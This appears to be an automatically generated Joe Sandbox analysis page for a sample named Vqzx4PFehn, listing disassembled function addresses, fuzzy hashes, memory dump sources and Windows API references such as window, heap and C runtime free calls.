Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 60724046d42dcf0146637d10dda6f31e514f02c62f38a124a0285aa7955cd054
Instruction ID: 752f7042f31c51b78c0ccc0818ba6546e2cc9061ea4376466ba587d658735294
Opcode Fuzzy Hash: 60724046d42dcf0146637d10dda6f31e514f02c62f38a124a0285aa7955cd054
Instruction Fuzzy Hash: 73C147729183418FC354CF29D88065AFBE2BFC8208F19892DE9D8DB311D734E949DB96

Uniqueness

Uniqueness Score: -1.00%

Function 0101F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0101F3A5), ref: 0101F9DA

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 51366c172b3b3be880f8c42bae8656c027fdfeca031f8cf555cf94c686fd7b3c
Instruction ID: f3e361959f6a4ff04e6f11a12ddb433cc666aa249d1544aae616b5a751f8af56
Opcode Fuzzy Hash: 51366c172b3b3be880f8c42bae8656c027fdfeca031f8cf555cf94c686fd7b3c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01010723 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

, xrefs: 01010761

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f9f1c2bed15b44f839f0c6247bb41c9584460cb63a71212a500cbf4f9e6b509d
Instruction ID: c73d31279be93d2b3240f60ee4e351777b17dde0149cdc0c34fbd81bee411ab1
Opcode Fuzzy Hash: f9f1c2bed15b44f839f0c6247bb41c9584460cb63a71212a500cbf4f9e6b509d
Instruction Fuzzy Hash: DC118671E047069EE7698F5DD4557AABBE4BB04710F14C82EE5EBE3688C279A180CF00

Uniqueness

Uniqueness Score: -1.00%

Function 0102C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0102C030

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 544a1257402eaa7d5b1d74b5e2a583496d349f09e7f55f9f7bded46059a595af
Instruction ID: 3e735b2a76f39c126791840c5d54c00fb7c4107a881289deb42e9d21441d9f7b
Opcode Fuzzy Hash: 544a1257402eaa7d5b1d74b5e2a583496d349f09e7f55f9f7bded46059a595af
Instruction Fuzzy Hash: F1A02430101100CFC310CF30574C30C37FC75041C13050015F0C4C4014D77D44505700

Uniqueness

Uniqueness Score: -1.00%

Function 010162CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: 62cccbdc43b68e477a311087bd8f9b71023535ee7635053a3305f203a3706297
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: 7D62F4716047858FCB25CF28C8906F9BBE1BF95304F08896ED8DA8B34AD779E545CB11

Uniqueness

Uniqueness Score: -1.00%

Function 010177EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: ce37d6de703377c768d4322ab93539e7aeac476b3c343bd4677707ed6ae07d6e
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction Fuzzy Hash: C062C7716083498FCB15CF28C8905B9BBE1BF95304F0889AEEDDA8B34AD734E945CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0100F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: d6b1ed628d37114219d5566661900bf6946cc371e29045e585847e90bea51173
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: 77524C72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE99597255D334EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 01017153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa9073c077dd5454fc41fc2e35bbf441b9493b9c46813b017af83cb97d3bd00
Instruction ID: 5ef0859d00099ad22d0cfae520f2a026f276146373d0e16c491d919c685d5cad
Opcode Fuzzy Hash: 8aa9073c077dd5454fc41fc2e35bbf441b9493b9c46813b017af83cb97d3bd00
Instruction Fuzzy Hash: 4412D0B06047068FC729CF28C890AB9B7E1FF98304F14892EE9D6C7785E778A595CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0100C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b76781ff3390ba8bc4293c8fad1f38852517afb9157594c4fdb3c970368d963
Instruction ID: 0db611fa1acf40e78918e1be0f439bb13950e3b9f46c10fe9b27baa3b9622239
Opcode Fuzzy Hash: 8b76781ff3390ba8bc4293c8fad1f38852517afb9157594c4fdb3c970368d963
Instruction Fuzzy Hash: 64F1AA716083018FF35ACE28CA8866EBBE1EF89314F154BAEF5C597291D730E9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 0100E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc63a23b9c99526e6e4827de589d9723f9c345509adafbe5e31e8dead429db51
Instruction ID: e63063db3da6cc0b46d332e89f6e7d38fbf5936b342dfb87937630a6827fb1f8
Opcode Fuzzy Hash: bc63a23b9c99526e6e4827de589d9723f9c345509adafbe5e31e8dead429db51
Instruction Fuzzy Hash: DAE16DB95083948FD315CF19D98046BBFF0AF9A300F49095EF9C497352D236EA19DB92

Uniqueness

Uniqueness Score: -1.00%

Function 01014088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: 0e71baa4b98d31938451221d1f045e8a8be1f53dc6e5eb7497dead484dbbf9dc
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: CD9143B030034A8BEB25EE68D894BFE77D5EBA0304F54092DEAD6C72C5DB789585C351

Uniqueness

Uniqueness Score: -1.00%

Function 010143BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 17ebbe5ab46b511d7d505b565235103b9e696ffff0de12b763c1e5597a2c27b6
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 1E815C713443468BEB25DE68C8D0BFD77D4AB94308F04092DEAC6CB69ADF7885858752

Uniqueness

Uniqueness Score: -1.00%

Function 010251C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10128f1a7d311294cc35263ca03aaeee4745b08c3a9d5a4369fce84cc2d05997
Instruction ID: 2a4a1d2b4c88d1a333736881aae1f1735f2a194d99cc3c33aeb41a62722d7bb2
Opcode Fuzzy Hash: 10128f1a7d311294cc35263ca03aaeee4745b08c3a9d5a4369fce84cc2d05997
Instruction Fuzzy Hash: 0561A83160073966EBB89A6C6C947FE63D4EB13210F04959AFAC3DF2C1D691D84A861D

Uniqueness

Uniqueness Score: -1.00%

Function 01024F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 340b8eb8a6e8c06bbba6cc4c00c2b3dd21337ad6c37c58b72ddc8bd1a5eedc0b
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 26518860300B3557EFB9456C8C99FFF2BC99B52200F58089AEBC3CB692D609E545C39E

Uniqueness

Uniqueness Score: -1.00%

Function 0100EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7bb492a207a3d2c86173f315b973cf4e899c29de09a501614c690faceaf0de1
Instruction ID: 287d4bb29ec43ab5b54c119976bc638c3fb83d547fa010fd75acc0070a46dedc
Opcode Fuzzy Hash: c7bb492a207a3d2c86173f315b973cf4e899c29de09a501614c690faceaf0de1
Instruction Fuzzy Hash: C851C4315093964FE723CF28C5844EEBFE0AE9A614F490999F4D95B283C221D68ADB52

Uniqueness

Uniqueness Score: -1.00%

Function 010100B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
Instruction ID: 304fd4cdbcefe9943b6cee2b0913a5a491fa50279448c3f6362cff1b06abbfaf
Opcode Fuzzy Hash: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
Instruction Fuzzy Hash: BB51DEB1A087159FC748CF19D48055AF7E1FB88324F058A2EF899E3340D735E999CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 01013E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: b87aa642bf52f93208661ed39b590bc995cefb1abea06ad5cf7fd95ba50059f3
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 2831E4B17147468FDB55DF28C8502AABBE0FB95314F44452DE4C5DB341CB38E90ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0100E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0100E30E

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,01041030,?,0100D928,00000000,?,00000050,01041030), ref: 01011DC4

_strlen.LIBCMT ref: 0100E32F
SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
GetWindowRect.USER32(?,?), ref: 0100E3C9
GetClientRect.USER32(?,?), ref: 0100E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0100E475
GetWindowRect.USER32(?,?), ref: 0100E4A2
SetWindowTextW.USER32(?,?), ref: 0100E4DB
GetSystemMetrics.USER32(00000008), ref: 0100E4E3
GetWindow.USER32(?,00000005), ref: 0100E4EE
GetWindowRect.USER32(00000000,?), ref: 0100E51B
GetWindow.USER32(00000000,00000002), ref: 0100E58D

Strings

CAPTION, xrefs: 0100E4BD
$%s:, xrefs: 0100E302
d, xrefs: 0100E3F5

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 2a16ce71bf5e0b9cfa7c3977f408447a8556ac37093d41f244bdf91471504be5
Instruction ID: 77572dba87375e63bc7a4dfe3971a20d318bad5496172d233b9976a4215ce5b3
Opcode Fuzzy Hash: 2a16ce71bf5e0b9cfa7c3977f408447a8556ac37093d41f244bdf91471504be5
Instruction Fuzzy Hash: C8819371504301AFE711DFA8CD88A6BBBE9FBC8714F04491DFAC4AB291D675E8058B52

Uniqueness

Uniqueness Score: -1.00%

Function 0102CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0102CB66

Part of subcall function 0102C701: _free.LIBCMT ref: 0102C71E
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C730
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C742
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C754
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C766
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C778
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C78A
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C79C
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7AE
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7C0
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7D2
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7E4
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7F6

_free.LIBCMT ref: 0102CB5B

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(?,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?,?), ref: 01028DF4

_free.LIBCMT ref: 0102CB7D
_free.LIBCMT ref: 0102CB92
_free.LIBCMT ref: 0102CB9D
_free.LIBCMT ref: 0102CBBF
_free.LIBCMT ref: 0102CBD2
_free.LIBCMT ref: 0102CBE0
_free.LIBCMT ref: 0102CBEB
_free.LIBCMT ref: 0102CC23
_free.LIBCMT ref: 0102CC2A
_free.LIBCMT ref: 0102CC47
_free.LIBCMT ref: 0102CC5F

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
Instruction ID: 92a1fe252f5fb22641233d3ea0ec513d1b79043f541a32e0cbcd75d5f46099e7
Opcode Fuzzy Hash: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
